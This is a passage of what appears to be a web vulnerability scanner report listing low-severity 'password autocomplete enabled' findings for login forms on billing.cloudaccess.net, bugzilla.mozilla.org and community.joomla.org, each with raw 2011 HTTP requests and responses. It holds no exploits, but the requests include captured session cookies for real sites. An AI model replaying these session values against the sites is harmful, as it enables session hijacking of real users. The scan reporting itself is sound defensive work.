    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />
       
       <p>
...[SNIP]...

15.9. https://billing.cloudaccess.net/knowledgebase/12/Cloud-Control-Panel

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /knowledgebase/12/Cloud-Control-Panel

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/knowledgebase/12/dologin.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /knowledgebase/12/Cloud-Control-Panel HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:33 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6866
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />
       
       <p>
...[SNIP]...

15.10. https://billing.cloudaccess.net/knowledgebase/13/Images

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /knowledgebase/13/Images

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/knowledgebase/13/dologin.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /knowledgebase/13/Images HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:57 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5709
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />
       
       <p>
...[SNIP]...

15.11. https://billing.cloudaccess.net/knowledgebase/14/Article-Manager

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /knowledgebase/14/Article-Manager

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/knowledgebase/14/dologin.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /knowledgebase/14/Article-Manager HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:51 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10089


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />
       
       <p>
...[SNIP]...

15.12. https://billing.cloudaccess.net/knowledgebase/15/Support

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /knowledgebase/15/Support

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/knowledgebase/15/dologin.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /knowledgebase/15/Support HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:30 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5648
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />
       
       <p>
...[SNIP]...

15.13. https://billing.cloudaccess.net/knowledgebase/28/How-to-change-your-domain-name.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /knowledgebase/28/How-to-change-your-domain-name.html

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/knowledgebase/28/dologin.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /knowledgebase/28/How-to-change-your-domain-name.html HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:09 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8379


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />
       
       <p>
...[SNIP]...

15.14. https://billing.cloudaccess.net/knowledgebase/38/How-to-upgrade-your-demo-site.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /knowledgebase/38/How-to-upgrade-your-demo-site.html

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/knowledgebase/38/dologin.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /knowledgebase/38/How-to-upgrade-your-demo-site.html HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:24 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />
       
       <p>
...[SNIP]...

15.15. https://billing.cloudaccess.net/submitticket.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /submitticket.php

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/dologin.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /submitticket.php?step=2&deptid=14 HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:33 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5699
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />
       
       <p>
...[SNIP]...

15.16. https://billing.cloudaccess.net/submitticket.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /submitticket.php

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/jwhmcs.php?goto=submitticket&task=ulogin
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /submitticket.php?step=2&deptid=14 HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:33 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5699
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
</p>
<form action="jwhmcs.php?goto=submitticket&task=ulogin" method="post" name="frmlogin" id="frmlogin">
<table style="margin: 0 auto;" cellpadding="0" cellspacing="0" border="0" align="center" class="frame">
...[SNIP]...
<td><input type="password" name="password" size="25" value="" /></td>
...[SNIP]...

15.17. https://bugzilla.mozilla.org/show_bug.cgi

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page contains a form with the following action URL:
  • https://bugzilla.mozilla.org/show_bug.cgi?id=378962
The form contains the following password field with autocomplete enabled:
  • Bugzilla_password

Request

GET /show_bug.cgi?id=378962 HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs05
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Mon, 24 Jan 2011 22:30:22 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 58445

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Bug 378962 &ndash; firefox incorrectly decodeURI
...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi?id=378962" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_top"
onsubmit="return check_mini_login_fields( '_top' );"
>

<input id="Bugzilla_login_top"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_top')"
>
<input class="bz_password"
id="Bugzilla_password_top"
name="Bugzilla_password"
type="password"
>

<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_top" value="password"
onfocus="mini_login_on_focus('_top')"
>
...[SNIP]...

15.18. https://bugzilla.mozilla.org/show_bug.cgi

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page contains a form with the following action URL:
  • https://bugzilla.mozilla.org/show_bug.cgi
The form contains the following password field with autocomplete enabled:
  • Bugzilla_password

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Mon, 24 Jan 2011 22:30:20 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 11817

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>



...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_bottom"
onsubmit="return check_mini_login_fields( '_bottom' );"
>

<input id="Bugzilla_login_bottom"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_bottom')"
>
<input class="bz_password"
id="Bugzilla_password_bottom"
name="Bugzilla_password"
type="password"
>

<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_bottom" value="password"
onfocus="mini_login_on_focus('_bottom')"

...[SNIP]...

15.19. https://bugzilla.mozilla.org/show_bug.cgi

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page contains a form with the following action URL:
  • https://bugzilla.mozilla.org/show_bug.cgi
The form contains the following password field with autocomplete enabled:
  • Bugzilla_password

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Mon, 24 Jan 2011 22:30:20 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 11817

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>



...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_top"
onsubmit="return check_mini_login_fields( '_top' );"
>

<input id="Bugzilla_login_top"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_top')"
>
<input class="bz_password"
id="Bugzilla_password_top"
name="Bugzilla_password"
type="password"
>

<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_top" value="password"
onfocus="mini_login_on_focus('_top')"
>
...[SNIP]...

15.20. https://bugzilla.mozilla.org/show_bug.cgi

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page contains a form with the following action URL:
  • https://bugzilla.mozilla.org/show_bug.cgi?id=378962
The form contains the following password field with autocomplete enabled:
  • Bugzilla_password

Request

GET /show_bug.cgi?id=378962 HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs05
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Mon, 24 Jan 2011 22:30:22 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 58445

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Bug 378962 &ndash; firefox incorrectly decodeURI
...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi?id=378962" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_bottom"
onsubmit="return check_mini_login_fields( '_bottom' );"
>

<input id="Bugzilla_login_bottom"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_bottom')"
>
<input class="bz_password"
id="Bugzilla_password_bottom"
name="Bugzilla_password"
type="password"
>

<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_bottom" value="password"
onfocus="mini_login_on_focus('_bottom')"

...[SNIP]...

15.21. http://community.joomla.org/login.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /login.html

Issue detail

The page contains a form with the following action URL:
  • http://community.joomla.org/login.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /login.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:44 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
</div>
<form action="/login.html" method="post" name="com-login" id="com-form-login">
<table width="100%" border="0" align="center" cellpadding="4" cellspacing="0" class="contentpane">
...[SNIP]...
<br />
       <input type="password" id="passwd" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.22. http://community.joomla.org/showcase/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/

Issue detail

The page contains a form with the following action URL:
  • http://community.joomla.org/showcase/index.php
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /showcase/ HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff1c090dbcaab6cc278de2960e220011; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/index.php" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.23. http://community.joomla.org/showcase/how-to-submit-a-site.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/how-to-submit-a-site.html

Issue detail

The page contains a form with the following action URL:
  • http://community.joomla.org/showcase/how-to-submit-a-site.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /showcase/how-to-submit-a-site.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=be510ddcd2bf15612a74f73f10f6bdfe; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/how-to-submit-a-site.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.24. http://community.joomla.org/showcase/sites-of-the-month.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/sites-of-the-month.html

Issue detail

The page contains a form with the following action URL:
  • http://community.joomla.org/showcase/sites-of-the-month.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /showcase/sites-of-the-month.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff4fc6ec86026a313be3c261f8519100; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/sites-of-the-month.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.25. http://community.joomla.org/showcase/sites/advsearch.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/sites/advsearch.html

Issue detail

The page contains a form with the following action URL:
  • http://community.joomla.org/showcase/sites.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /showcase/sites/advsearch.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=6cd3aab8711a0481615375ee027eb309; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/sites.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.26. http://community.joomla.org/showcase/sites/new.html

Summary

